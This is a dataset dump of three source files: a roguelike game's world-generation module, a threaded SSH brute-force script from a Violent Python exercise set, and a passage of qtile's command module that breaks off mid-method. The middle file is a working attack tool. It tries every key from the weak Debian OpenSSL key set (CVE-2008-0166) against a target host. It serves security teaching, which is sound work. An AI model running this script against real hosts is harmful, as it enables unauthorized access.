| repo_name (stringlengths 5-92) | path (stringlengths 4-221) | copies (stringclasses 19 values) | size (stringlengths 4-6) | content (stringlengths 766-896k) | license (stringclasses 15 values) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51-99.9) | line_max (int64, 32-997) | alpha_frac (float64, 0.25-0.96) | autogenerated (bool, 1 class) | ratio (float64, 1.5-13.6) | config_test (bool, 2 classes) | has_no_keywords (bool, 2 classes) | few_assignments (bool, 1 class) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
abeing/droog | droog/world.py | 1 | 26187 |
# -*- coding: UTF-8 -*-
# Droog
# Copyright (C) 2015 Adam Miezianko
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""The Droog module for handling the world.
Location -- A class for value objects storing coordinates in the world.
World -- A class for reference objects of the World itself.
"""
import random
import logging
import math
from . import tile
from . import engine
from . import english
from . import the
LOG = logging.getLogger(__name__)
TREE_CHANCE = 0.05
ROAD_GRID_SIZE = 24
ROAD_CHANCE = 0.5
BUILDING_CHANCE = 0.42
WALL_BREAK_CHANCE = 0.12
mult = [[1, 0, 0, -1, -1, 0, 0, 1],
[0, 1, -1, 0, 0, -1, 1, 0],
[0, 1, 1, 0, 0, -1, -1, 0],
[1, 0, 0, 1, -1, 0, 0, -1]]
class Location(object):
"""The Location class represents a position on a grid."""
def __init__(self, row, col):
"""Construct a new location."""
self.row = row
self.col = col
def offset(self, delta_row, delta_col):
"""Offset the location by a given number of rows and columns."""
return Location(self.row + delta_row, self.col + delta_col)
def distance_to(self, other_loc):
"""Return the distance between another location and this one."""
delta_row = abs(other_loc.row - self.row)
delta_col = abs(other_loc.col - self.col)
return math.sqrt(delta_row * delta_row + delta_col * delta_col)
def delta_to(self, other_loc):
"""Return a delta between the other_loc and this one."""
if other_loc.row == self.row:
delta_row = 0
else:
delta_row = 1 if (other_loc.row - self.row > 0) else -1
if other_loc.col == self.col:
delta_col = 0
else:
delta_col = 1 if (other_loc.col - self.col > 0) else -1
return Location(delta_row, delta_col)
def __repr__(self):
"""Return string representation."""
return "(%r, %r)" % (self.row, self.col)
def __eq__(self, other):
"""Return True if these have the same value."""
if isinstance(other, self.__class__):
return self.__dict__ == other.__dict__
else:
return False
def __ne__(self, other):
"""Return True if these do not have the same value."""
return not self.__eq__(other)
def random_delta():
"""Return a random delta."""
return Location(random.choice([-1, 0, 1]), random.choice([-1, 0, 1]))
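# Illustrative usage of the Location helpers above (added sketch, not part of
# the original module):
#
#     >>> Location(2, 3).offset(1, -1)
#     (3, 2)
#     >>> Location(0, 0).distance_to(Location(3, 4))
#     5.0
#     >>> Location(0, 0).delta_to(Location(5, -2))
#     (1, -1)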
class World(object):
"""Representation of the game world."""
def __init__(self, rows, cols):
"""Creates a World of the specified width, height, number of roads and
probability of intersection continuations.
The world is a grid of streets with the hero in the center.
"""
assert rows > 20
assert cols > 20
self.cols = cols
self.rows = rows
self.tiles = []
self.generator = engine.Generator()
self.generator_location = None
# The junction grid used to make this map, for logging and debugging.
self._junction_grid = None
for row in range(rows):
self.tiles.append(list())
for _ in range(cols):
self.tiles[row].append(tile.make_empty())
self.hero_location = self._position_hero()
self.cell(self.hero_location).creature = the.hero
self._generate()
self.do_fov()
self.visible_monsters = []
self.monster_count = 0
self.dead_monsters = []
def is_empty(self, loc):
"""Returns True if the location is empty."""
return self.cell(loc).transparent
def is_valid_location(self, loc):
"""Return true if this location is in the world bounds."""
return 0 <= loc.row < self.rows and 0 <= loc.col < self.cols
def cell(self, loc):
"""Return the tile at the location."""
return self.tiles[loc.row][loc.col]
def size_in_tiles(self):
"""Return the size of the world in tiles."""
return self.rows * self.cols
def indoor_walkable_locations(self):
"""Return a list of Locations that are indoors."""
results = []
for row in xrange(self.rows):
for col in xrange(self.cols):
loc = Location(row, col)
if self.cell(loc).indoor and self.cell(loc).walkable:
results.append(loc)
return results
def outdoor_walkable_locations(self):
"""Return a list of Locations that are outside and walkable."""
results = []
for row in xrange(self.rows):
for col in xrange(self.cols):
loc = Location(row, col)
if not self.cell(loc).indoor and self.cell(loc).walkable:
results.append(loc)
return results
def glyph_at(self, loc):
"""Returns the world glyph and its color at the specified location. If
the location coordinates are out of bounds, returns a shield character.
"""
if loc == self.hero_location:
return '@'
cell = self.cell(loc)
if cell.creature:
return cell.creature.glyph
if cell.items:
return cell.items[0].glyph
return cell.glyph
def description_at(self, loc):
"""Return a description of the location specified.
The description of a map location is description of the first of the
following elements at that location: monster, item, tile.
If the location is invalid, the empty string is returned.
"""
if loc == self.hero_location:
return "yourself"
if self.cell(loc).creature:
return english.indefinite_creature(self.cell(loc).creature)
if self.cell(loc).items:
return self.item_description_at(loc)
else:
return self.cell(loc).description
def item_description_at(self, loc):
"""Return a description of the items at a location."""
items_msg = ""
items = self.cell(loc).items
if items:
items_msg = "%s" % items[0].name
if len(items) > 1:
items_msg += " amongst other things."
else:
items_msg += "."
return items_msg
def move_creature(self, from_loc, delta):
"""Move a creature or hero at (y, x) by (delta_y, delta_x) and return
the action point costs of the movement or zero if the movement was not
possible.
At the moment, only single-step movement is permitted as we do not have
pathfinding implemented."""
assert delta.row < 2
assert delta.col < 2
to_loc = from_loc.offset(delta.row, delta.col)
if self.cell(to_loc).walkable:
moved_creature = self.cell(from_loc).creature
LOG.info('Moved creature %r from %r to %r', moved_creature.name,
from_loc, to_loc)
moved_creature.loc = to_loc
self.cell(from_loc).creature = None
self.cell(to_loc).creature = moved_creature
return engine.movement_cost(delta.row, delta.col)
return 0
def change_hero_loc(self, new_loc):
"""Change the hero location."""
old_loc = self.hero_location
self.hero_location = new_loc
self.cell(old_loc).creature = None
self.cell(new_loc).creature = the.hero
self.do_fov()
def move_hero(self, delta_y, delta_x):
"""Move the hero by (delta_y, delta_x)."""
old_loc = self.hero_location
new_loc = self.hero_location.offset(delta_y, delta_x)
if self.cell(new_loc).walkable:
LOG.info('Moved hero from %r to %r', old_loc, new_loc)
self.change_hero_loc(new_loc)
# If there are items in the new location, report about them in the
# message LOG.
items_msg = self.item_description_at(new_loc)
if items_msg:
the.messages.add("You see here %s" % items_msg)
return engine.movement_cost(delta_y, delta_x)
target = self.cell(new_loc).creature
if target:
return the.hero.melee_attack(target)
# If we bumped into the shield generator, we begin to jury-rig it.
if self.glyph_at(new_loc) == 'G':
return self.generator.deactivate()
return 0
def _position_hero(self):
"""Calculates the location for the hero.
The hero will start in the other ring of the map."""
rand_dist = random.uniform(self.cols / 4, self.cols / 2 - 1)
rand_dir = random.uniform(0, 359)
row = int(rand_dist * math.sin(rand_dir)) + self.rows / 2
col = int(rand_dist * math.cos(rand_dir)) + self.cols / 2
the.hero.loc = Location(row, col)
LOG.debug("Hero starts at %r.", the.hero.loc)
return Location(row, col)
def add_road(self, start_loc, delta_y, delta_x, beta):
"""Adds a road to the map
Starting at (start_y, start_x) and heading in a direction specified by
delta_y and delta_x, draw a map until we reach the edge of the map. If
we run into another road, continue with probability beta, otherwise
stop."""
assert delta_y * delta_x == 0, 'We only support orthogonal roads.'
keep_going = True
road_loc = start_loc
while self.is_valid_location(road_loc) and keep_going:
self.tiles[road_loc.row][road_loc.col] = tile.make_street()
road_loc = road_loc.offset(delta_y, delta_x)
if self.is_valid_location(road_loc) \
and self.cell(road_loc).glyph == '#':
keep_going = random.uniform(0, 1) < beta
def _log(self):
"""Dumps the world into a file called 'world.dump'"""
with open("world.dump", "w") as dump_file:
for row in self._junction_grid:
dump_file.write("%r" % row)
for row in range(self.rows):
for col in range(self.cols):
dump_file.write(self.cell(Location(row, col)).glyph)
dump_file.write("\n")
def random_empty_location(self, near=None, attempts=5, radius=10):
"""Creates a random location on the map, or a random location on the
map near a specified location."""
while attempts > 0:
if near is None:
row = int(random.uniform(0, self.rows))
col = int(random.uniform(0, self.cols))
else:
row = int(random.triangular(low=near.row - radius,
high=near.row + radius))
col = int(random.triangular(low=near.col - radius,
high=near.col + radius))
loc = Location(row, col)
if self.is_valid_location(loc) and \
self.cell(loc).creature is None and self.cell(loc).walkable:
return loc
attempts -= 1
return None
def teleport_hero(self, near):
"""Teleports the hero to a valid location near a specified location."""
new_loc = self.random_empty_location(near)
self.change_hero_loc(new_loc)
def attempt_to_place_monster(self, monster, near=None, hidden=False):
"""Spawns a monster on the map.
The monster should already be created, place_monster only attempts to
find a suitable location on the map and place it. If a suitable
location cannot be found in one attempt, it returns False.
monster - the monster to add to the map
near - a location near which to place the monster, or None if anywhere
in the world is eligible
hidden - whether to exclude locations visible to the hero
"""
assert monster
location = self.random_empty_location(near)
if location is None:
return False
if self.cell(location).seen and hidden:
return False
if monster is not None:
the.turn.add_actor(monster)
monster.loc = location
self.cell(location).creature = monster
LOG.info('%r placed at %r', monster, location)
self.monster_count += 1
return True
def remove_monster(self, monster):
"""Removes a monster from the map, for example when it dies."""
self.visible_monsters.remove(monster)
self.tiles[monster.loc.row][monster.loc.col].creature = None
self.monster_count -= 1
self.dead_monsters.append(monster)
def add_item(self, loc, item):
"""Add an item to a location."""
assert self.is_valid_location(loc)
self.cell(loc).items.append(item)
def get_item(self, loc):
"""Get an item from the world."""
assert self.is_valid_location(loc)
item = None
if self.cell(loc).items:
item = self.cell(loc).items.pop()
return item
def set_lit(self, loc):
"""Set the cell at loc as visible."""
self.cell(loc).seen = True
monster = self.cell(loc).creature
if monster and monster not in self.visible_monsters:
self.visible_monsters.append(monster)
def _cast_light(self, cx, cy, row, start, end, radius, xx, xy, yx, yy):
"Recursive lightcasting function"
if start < end:
return
radius_squared = radius*radius
for j in range(row, radius+1):
dx, dy = -j-1, -j
blocked = False
while dx <= 0:
dx += 1
# Translate the dx, dy coordinates into map coordinates:
X, Y = cx + dx * xx + dy * xy, cy + dx * yx + dy * yy
# l_slope and r_slope store the slopes of the left and right
# extremities of the square we're considering:
l_slope, r_slope = (dx-0.5)/(dy+0.5), (dx+0.5)/(dy-0.5)
loc = Location(Y, X)
if not self.is_valid_location(loc):
return
if start < r_slope:
continue
elif end > l_slope:
break
else:
# Our light beam is touching this square; light it:
if dx*dx + dy*dy < radius_squared:
self.set_lit(loc)
if blocked:
# we're scanning a row of blocked squares:
if not self.is_empty(loc):
new_start = r_slope
continue
else:
blocked = False
start = new_start
else:
if not self.is_empty(loc) and j < radius:
# This is a blocking square, start a child scan:
blocked = True
self._cast_light(cx, cy, j+1, start, l_slope,
radius, xx, xy, yx, yy)
new_start = r_slope
# Row is scanned; do next row unless last square was blocked:
if blocked:
break
def reset_fov(self):
"""Reset the field of view data for the map."""
for row in xrange(self.rows):
for col in xrange(self.cols):
self.tiles[row][col].seen = False
self.visible_monsters = []
def do_fov(self):
"Calculate lit squares from the given location and radius"
self.reset_fov()
for octant in range(8):
self._cast_light(self.hero_location.col, self.hero_location.row,
1, 1.0, 0.0, 10,
mult[0][octant], mult[1][octant],
mult[2][octant], mult[3][octant])
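# Added commentary on the octant transform used by _cast_light (not original
# code): each octant maps the local scan coordinates (dx, dy) to map
# coordinates via X = cx + dx*xx + dy*xy and Y = cy + dx*yx + dy*yy.
# Octant 0 uses (xx, xy, yx, yy) = (1, 0, 0, 1), the identity, while octant 1
# uses (0, 1, 1, 0), mirroring the scan across the diagonal; for example, with
# cx=5, cy=7 and (dx, dy) = (-2, -3), octant 1 lights X = 5 + (-3) = 2 and
# Y = 7 + (-2) = 5. The eight columns of `mult` together cover the full
# radius-10 circle around the hero.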
def _generate(self):
"""Generate the world map.
This function builds the world in several stages.
1) Generate grasses, bushes and trees.
2) Generate the road grid.
3) Build the fortress.
4) Build the other buildings and a lake.
"""
self._generate_vegetation()
self._generate_roads()
self._generate_computer()
self._generate_shield()
self._generate_buildings()
def _generate_vegetation(self):
"""Fill the map with vegeation."""
for row in xrange(0, self.rows):
for col in xrange(0, self.cols):
if TREE_CHANCE > random.random():
self.tiles[row][col] = tile.make_tree()
else:
self.tiles[row][col] = tile.make_empty()
def _generate_roads(self):
"""Fill the map with a grid of roads."""
junction_grid = _create_junction_grid(self.rows, self.cols,
ROAD_GRID_SIZE)
self._junction_grid = junction_grid # for dumping purposes
prev_road_row = 0
road_row = ROAD_GRID_SIZE
prev_road_col = 0
road_col = ROAD_GRID_SIZE
for junction_row in junction_grid:
for junction in junction_row:
LOG.debug("Drawing junction %r", junction)
if junction[0]: # North road
LOG.debug("Drawing north road from row %d to row %d in "
"col %d", prev_road_row, road_row, road_col)
extended_prev_road_row = prev_road_row - 3
if extended_prev_road_row < 0:
extended_prev_road_row = 0
for row in xrange(extended_prev_road_row, road_row):
if self.tiles[row][road_col - 5].glyph != '*':
self.tiles[row][road_col - 5] = tile.make_empty()
if self.tiles[row][road_col - 4].glyph != '*':
self.tiles[row][road_col - 4] = tile.make_empty()
self.tiles[row][road_col - 3] = tile.make_street()
self.tiles[row][road_col - 2] = tile.make_street()
self.tiles[row][road_col - 1] = tile.make_street()
if road_col < self.cols - 1 \
and self.tiles[row][road_col].glyph != '*':
self.tiles[row][road_col + 0] = tile.make_empty()
if road_col < self.cols - 2 \
and self.tiles[row][road_col + 1].glyph != '*':
self.tiles[row][road_col + 1] = tile.make_empty()
if junction[3]: # West road
LOG.debug("Drawing west road from col %d to col %d in "
"row %d", prev_road_col, road_col, road_row)
for col in xrange(prev_road_col, road_col):
if self.tiles[road_row - 5][col].glyph != '*':
self.tiles[road_row - 5][col] = tile.make_empty()
if self.tiles[road_row - 4][col].glyph != '*':
self.tiles[road_row - 4][col] = tile.make_empty()
self.tiles[road_row - 3][col] = tile.make_street()
self.tiles[road_row - 2][col] = tile.make_street()
self.tiles[road_row - 1][col] = tile.make_street()
if road_row < self.rows - 1 \
and self.tiles[road_row][col].glyph != '*':
self.tiles[road_row][col] = tile.make_empty()
if road_row < self.rows - 2 \
and self.tiles[road_row + 1][col].glyph != '*':
self.tiles[road_row + 1][col] = tile.make_empty()
prev_road_col = road_col
road_col += ROAD_GRID_SIZE
if road_col >= self.cols:
road_col = self.cols
prev_road_row = road_row
road_row += ROAD_GRID_SIZE
if road_row >= self.rows:
road_row = self.rows
prev_road_col = 0
road_col = ROAD_GRID_SIZE
road_row = ROAD_GRID_SIZE
road_col = ROAD_GRID_SIZE
for junction_row in junction_grid:
for junction in junction_row:
if not junction[0] and not junction[3]:
self.tiles[road_row - 3][road_col - 3] = tile.make_empty()
if not junction[2] and not junction[3]:
self.tiles[road_row - 1][road_col - 3] = tile.make_empty()
if not junction[1] and not junction[2]:
self.tiles[road_row - 1][road_col - 1] = tile.make_empty()
if not junction[0] and not junction[1]:
self.tiles[road_row - 3][road_col - 1] = tile.make_empty()
road_col += ROAD_GRID_SIZE
if road_col >= self.cols:
road_col = self.cols
road_col = ROAD_GRID_SIZE
road_row += ROAD_GRID_SIZE
if road_row >= self.rows:
road_row = self.rows
def _generate_computer(self):
"""Places a shield generator in the center of the map."""
row = self.rows / 2
col = self.cols / 2
self.generator_location = Location(row, col)
self.tiles[row][col] = tile.make_shield_generator()
def _generate_shield(self):
"""Creates the shield border around the navigable map."""
for row in range(0, self.rows):
self.tiles[row][0] = tile.make_shield()
self.tiles[row][self.cols - 1] = tile.make_shield()
for col in range(self.cols):
self.tiles[0][col] = tile.make_shield()
self.tiles[self.rows - 1][col] = tile.make_shield()
def _generate_buildings(self):
"""Create buildings in some blocks."""
cell_begin_row = 0
cell_end_row = ROAD_GRID_SIZE
cell_begin_col = 0
cell_end_col = ROAD_GRID_SIZE
while cell_end_row < self.rows:
while cell_end_col < self.cols:
if random.random() < BUILDING_CHANCE:
begin = Location(cell_begin_row, cell_begin_col)
end = Location(cell_end_row, cell_end_col)
self._generate_building(begin, end)
cell_begin_col = cell_end_col
cell_end_col += ROAD_GRID_SIZE
cell_begin_row = cell_end_row
cell_end_row += ROAD_GRID_SIZE
cell_begin_col = 0
cell_end_col = ROAD_GRID_SIZE
def _generate_building(self, begin, end):
"""Create a building at the sepcified site."""
LOG.debug("Generating a building between %r and %r.", begin, end)
top = begin.row + random.randint(3, ROAD_GRID_SIZE / 3)
bottom = end.row - random.randint(6, ROAD_GRID_SIZE / 3)
left = begin.col + random.randint(3, ROAD_GRID_SIZE / 3)
right = end.col - random.randint(6, ROAD_GRID_SIZE / 3)
for row in xrange(top, bottom + 1):
for col in xrange(left, right + 1):
if row == top or row == bottom or col == left or col == right:
if WALL_BREAK_CHANCE < random.random():
self.tiles[row][col] = tile.make_wall()
else:
self.tiles[row][col] = tile.make_floor()
def _generate_random_junction(north, south, east, west):
"""Generate random junction given which roads much or must not exist.
For north, south, east, and west True means road must exist, False means
road must not exist, and None means either is okay.
"""
result = [north, south, east, west]
free_roads = []
for index in xrange(4):
if result[index] is None:
free_roads.append(index)
free_road_count = len(free_roads)
fill_road_count = 0
for _ in xrange(free_road_count):
fill_road_count += random.random() < ROAD_CHANCE
while fill_road_count > 0:
fill_road = random.choice(free_roads)
result[fill_road] = True
free_roads.remove(fill_road)
fill_road_count -= 1
road_count = 0
for road in result:
if road is True:
road_count += 1
if road_count == 1:
fill_road = random.choice(free_roads)
free_roads.remove(fill_road)
result[fill_road] = True
while free_roads:
fill_road = free_roads.pop()
result[fill_road] = False
return result
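# Added illustration (not original code): the result is a four-element list of
# booleans in the same order as the arguments; fixed True/False arguments are
# preserved and each None slot is filled at random (roughly with probability
# ROAD_CHANCE), with the extra rule that a junction never ends up with exactly
# one road. For instance, _generate_random_junction(True, None, None, False)
# can return [True, True, False, False] but never a single-road result such as
# [True, False, False, False].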
def _log_junction_grid(grid):
"""Writes the junction grid out to the log."""
LOG.debug("Junction grid")
for row in grid:
LOG.debug(row)
def _create_junction_grid(map_rows, map_cols, cell_size):
"""Create a grid of valid road intersations."""
assert cell_size < map_rows
assert cell_size < map_cols
junction_grid = []
rows = map_rows / cell_size
cols = map_cols / cell_size
LOG.debug("Creating junction grid of size %d rows by %d columns. cell"
" size is %d", rows, cols, cell_size)
for row in xrange(0, rows):
junction_grid.append([])
for col in xrange(0, cols):
north = junction_grid[row - 1][col][2] if row > 0 else None
west = junction_grid[row][col - 1][1] if col > 0 else None
junction = _generate_random_junction(north, None, None, west)
junction_grid[row].append(junction)
return junction_grid
| gpl-2.0 | 4,446,171,767,116,297,000 | 39.041284 | 79 | 0.543743 | false | 3.848765 | false | false | false |
QuintilianoB/Violent-Python-examples | Chapter 2/5.debianSshWeakPK.py | 1 | 3380 |
# SSH brute force with pxssh class and keyfile, based on chapter 2
# Python 3.4
"""
Another example of this script: https://www.exploit-db.com/exploits/5720/
The 32768 keys can be found here: https://github.com/g0tmi1k/debian-ssh
The exploit CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166
For this to work, you must have a Debian distro with a vulnerable version of OpenSSL.
I've tested it with version 0.9.8g
Download links:
1 Ubuntu pkg- https://launchpad.net/ubuntu/+source/openssl/0.9.8b-2ubuntu2.1
2 Source - https://www.openssl.org/source/old/0.9.x/openssl-0.9.8b.tar.gz
"""
import pexpect
import argparse
import os
import threading
maxConnections = 5
connection_lock = threading.BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0
def connect(user, host, keyfile, release):
global Stop
global Fails
try:
# Defines what pexpect should expect as return.
perm_denied = 'Permission denied'
ssh_newkey = 'Are you sure you want to continue'
conn_closed = 'Connection closed by remote host'
# SSH connection with keyfile instead of password. If no keyfile is sent, there will be no connection.
opt = ' -o PasswordAuthentication=no'
connStr = 'ssh ' + user + '@' + host + ' -i' + keyfile + opt
# Starts a connections and reads the return.
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT, perm_denied,ssh_newkey, conn_closed, '$', '#'])
if ret == 2:
print("[-] Adding host to know_host file")
child.sendline('yes')
connect(user, host, keyfile, False)
elif ret == 3:
print("[-] {0}.".format(conn_closed))
Fails += 1
elif ret > 3:
print("[+] Success. {0}".format(str(keyfile)))
Stop = True
finally:
# After the connection attempt, release the semaphore lock.
if release:
connection_lock.release()
def main():
# Defines the options and the help menu.
parser = argparse.ArgumentParser(description="Simple Python SSH Brute Force with keyfile")
parser.add_argument('Target', help="Target host.")
parser.add_argument('User', help="User for ssh connection.")
parser.add_argument('KeyDir', help="Directory with private keyfiles for connection.")
# Receives the arguments sent by the user.
args = parser.parse_args()
tgtHost = args.Target
user = args.User
keyDir = args.KeyDir
# If anything is not set, print the help menu from argparse and exit.
if tgtHost == None or user == None or keyDir == None:
print(parser.usage)
exit(0)
for keyfile in os.listdir(keyDir):
if Stop:
print("[*] Key found. Exiting.")
exit(0)
if Fails > 5:
print("[!] Too many connection errors. Exiting.")
exit(0)
connection_lock.acquire()
# Receives the keyfile's location and joins it with the file name for a complete path.
fullpath = os.path.join(keyDir, keyfile)
print("[-] Testing key: {0}".format(str(fullpath)))
# Defines and starts the thread.
bruteforce = threading.Thread(target=connect, args=(user, tgtHost, fullpath, True))
bruteforce.start()
if __name__ == '__main__':
main()
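# Example invocation (added; host and key directory are hypothetical):
#     python 5.debianSshWeakPK.py 192.168.56.101 root ./debian_ssh_keys/
# i.e. the three positional arguments Target, User and KeyDir parsed above.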
| gpl-2.0 | -930,355,457,819,945,000 | 30.598131 | 110 | 0.633728 | false | 3.806306 | false | false | false |
Fxrh/tispa-wm | libqtile/command.py | 1 | 12105 |
# Copyright (c) 2008, Aldo Cortesi. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import inspect
import traceback
import textwrap
import os
import ipc
class CommandError(Exception):
pass
class CommandException(Exception):
pass
class _SelectError(Exception):
def __init__(self, name, sel):
Exception.__init__(self)
self.name, self.sel = name, sel
SUCCESS = 0
ERROR = 1
EXCEPTION = 2
SOCKBASE = "qtilesocket.%s"
def formatSelector(lst):
"""
Takes a list of (name, sel) tuples, and returns a formatted
selector expression.
"""
expr = []
for i in lst:
if expr:
expr.append(".")
expr.append(i[0])
if i[1] is not None:
expr.append("[%s]" % repr(i[1]))
return "".join(expr)
class _Server(ipc.Server):
def __init__(self, fname, qtile, conf):
if os.path.exists(fname):
os.unlink(fname)
ipc.Server.__init__(self, fname, self.call)
self.qtile = qtile
self.widgets = {}
for i in conf.screens:
for j in i.gaps:
if hasattr(j, "widgets"):
for w in j.widgets:
if w.name:
self.widgets[w.name] = w
def call(self, data):
selectors, name, args, kwargs = data
try:
obj = self.qtile.select(selectors)
except _SelectError, v:
e = formatSelector([(v.name, v.sel)])
s = formatSelector(selectors)
return ERROR, "No object %s in path '%s'" % (e, s)
cmd = obj.command(name)
if not cmd:
return ERROR, "No such command."
self.qtile.log.info("Command: %s(%s, %s)" % (name, args, kwargs))
try:
return SUCCESS, cmd(*args, **kwargs)
except CommandError, v:
return ERROR, v.args[0]
except Exception, v:
return EXCEPTION, traceback.format_exc()
self.qtile.conn.flush()
class _Command:
def __init__(self, call, selectors, name):
"""
:command A string command name specification
:*args Arguments to be passed to the specified command
:*kwargs Arguments to be passed to the specified command
"""
self.selectors, self.name = selectors, name
self.call = call
def __call__(self, *args, **kwargs):
return self.call(self.selectors, self.name, *args, **kwargs)
class _CommandTree(object):
"""
A CommandTree is a hierarchical collection of command objects.
CommandTree objects act as containers, allowing them to be nested. The
commands themselves appear on the object as callable attributes.
"""
def __init__(self, call, selectors, myselector, parent):
self.call = call
self.selectors = selectors
self.myselector = myselector
self.parent = parent
@property
def path(self):
s = self.selectors[:]
if self.name:
s += [(self.name, self.myselector)]
return formatSelector(s)
def __getitem__(self, select):
if self.myselector:
raise KeyError("No such key: %s" % select)
c = self.__class__(self.call, self.selectors, select, self)
return c
def __getattr__(self, name):
nextSelector = self.selectors[:]
if self.name:
nextSelector.append((self.name, self.myselector))
if name in self._contains:
return _TreeMap[name](self.call, nextSelector, None, self)
else:
return _Command(self.call, nextSelector, name)
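# Added illustration (not part of the original module): attribute and item
# access on a command tree accumulates selectors, so for a client `c` the
# expression c.screen[0].layout.down yields a _Command with selectors
# [("screen", 0), ("layout", None)] and name "down"; calling it forwards those
# selectors and the name to self.call.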
class _TLayout(_CommandTree):
name = "layout"
_contains = ["group", "window", "screen"]
class _TWidget(_CommandTree):
name = "widget"
_contains = ["bar", "screen", "group"]
class _TBar(_CommandTree):
name = "bar"
_contains = ["screen"]
class _TWindow(_CommandTree):
name = "window"
_contains = ["group", "screen", "layout"]
class _TScreen(_CommandTree):
name = "screen"
_contains = ["layout", "window", "bar"]
class _TGroup(_CommandTree):
name = "group"
_contains = ["layout", "window", "screen"]
_TreeMap = {
"layout": _TLayout,
"widget": _TWidget,
"bar": _TBar,
"window": _TWindow,
"screen": _TScreen,
"group": _TGroup,
}
class _CommandRoot(_CommandTree):
name = None
_contains = ["layout", "widget", "screen", "bar", "window", "group"]
def __init__(self):
"""
This method constructs the entire hierarchy of callable commands
from a conf object.
"""
_CommandTree.__init__(self, self.call, [], None, None)
def __getitem__(self, select):
raise KeyError("No such key: %s" % select)
def call(self, selectors, name, *args, **kwargs):
"""
This method is called for issued commands.
:selectors A list of (name, selector) tuples.
:name Command name.
"""
pass
def find_sockfile(display=None):
"""
Finds the appropriate socket file.
"""
if not display:
display = os.environ.get("DISPLAY")
if not display:
display = ":0.0"
if '.' not in display:
display += '.0'
cache_directory = os.path.expandvars('$XDG_CACHE_HOME')
if cache_directory == '$XDG_CACHE_HOME':
# if variable wasn't set
cache_directory = os.path.expanduser("~/.cache")
if not os.path.exists(cache_directory):
os.makedirs(cache_directory)
return os.path.join(cache_directory, SOCKBASE % display)
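# Example (added for clarity; the exact path is environment dependent): with
# DISPLAY=":0" and XDG_CACHE_HOME unset, find_sockfile() yields something like
# /home/<user>/.cache/qtilesocket.:0.0, since the display is normalised to
# ":0.0" before being substituted into SOCKBASE.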
class Client(_CommandRoot):
"""
Exposes a command tree used to communicate with a running instance of
Qtile.
"""
def __init__(self, fname=None):
if not fname:
fname = find_sockfile()
self.client = ipc.Client(fname)
_CommandRoot.__init__(self)
def call(self, selectors, name, *args, **kwargs):
state, val = self.client.call((selectors, name, args, kwargs))
if state == SUCCESS:
return val
elif state == ERROR:
raise CommandError(val)
else:
raise CommandException(val)
class CommandRoot(_CommandRoot):
def __init__(self, qtile):
self.qtile = qtile
super(CommandRoot, self).__init__()
def call(self, selectors, name, *args, **kwargs):
state, val = self.qtile.server.call((selectors, name, args, kwargs))
if state == SUCCESS:
return val
elif state == ERROR:
raise CommandError(val)
else:
raise CommandException(val)
class _Call:
def __init__(self, selectors, name, *args, **kwargs):
"""
:command A string command name specification
:*args Arguments to be passed to the specified command
:*kwargs Arguments to be passed to the specified command
"""
self.selectors, self.name = selectors, name
self.args, self.kwargs = args, kwargs
# Conditionals
self.layout = None
def when(self, layout=None):
self.layout = layout
return self
def check(self, q):
if self.layout and q.currentLayout.name != self.layout:
return False
return True
class _LazyTree(_CommandRoot):
def call(self, selectors, name, *args, **kwargs):
return _Call(selectors, name, *args, **kwargs)
lazy = _LazyTree()
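# Added illustration: `lazy` defers command execution. lazy.layout.down()
# returns a _Call with selectors [("layout", None)] and name "down", and
# .when(layout="max") attaches a condition that _Call.check() can later
# evaluate against the current layout.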
class CommandObject(object):
"""
Base class for objects that expose commands. Each command should be a
method named cmd_X, where X is the command name.
"""
def select(self, selectors):
if not selectors:
return self
name, sel = selectors[0]
selectors = selectors[1:]
r = self.items(name)
if (r is None) or\
(r[1] is None and sel is not None) or\
(r[1] is not None and sel and sel not in r[1]) or\
(r[0] is False and sel is None):
raise _SelectError(name, sel)
obj = self._select(name, sel)
if obj is None:
raise _SelectError(name, sel)
return obj.select(selectors)
def items(self, name):
"""
Returns a list of contained items for this name.
"""
ret = self._items(name)
if ret is None:
raise CommandError("Unknown item class: %s" % name)
return ret
def _items(self, name):
"""
Return (root, items) tuple for the specified item class, with:
root: True if this class accepts a "naked" specification
without an item specification (i.e. "layout"), and False if it
does not.
items is a list of contained items, or None if this object is
not a valid container.
Return None if name is not a valid item class.
"""
raise NotImplementedError
def _select(self, name, sel, selectors):
"""
Return a selected object, or None if no such object exists.
This method is called with the following guarantees:
- name is a valid selector class for this item
- sel is a valid selector for this item
- the name, sel tuple is not an "impossible" combination (e.g.
a selector is specified when this is not a containment
object).
"""
raise NotImplementedError
def command(self, name):
return getattr(self, "cmd_" + name, None)
def commands(self):
lst = []
for i in dir(self):
if i.startswith("cmd_"):
lst.append(i[4:])
return lst
def cmd_commands(self):
"""
Returns a list of possible commands for this object.
Used by __qsh__ for command completion and online help.
"""
return self.commands()
def cmd_items(self, name):
"""
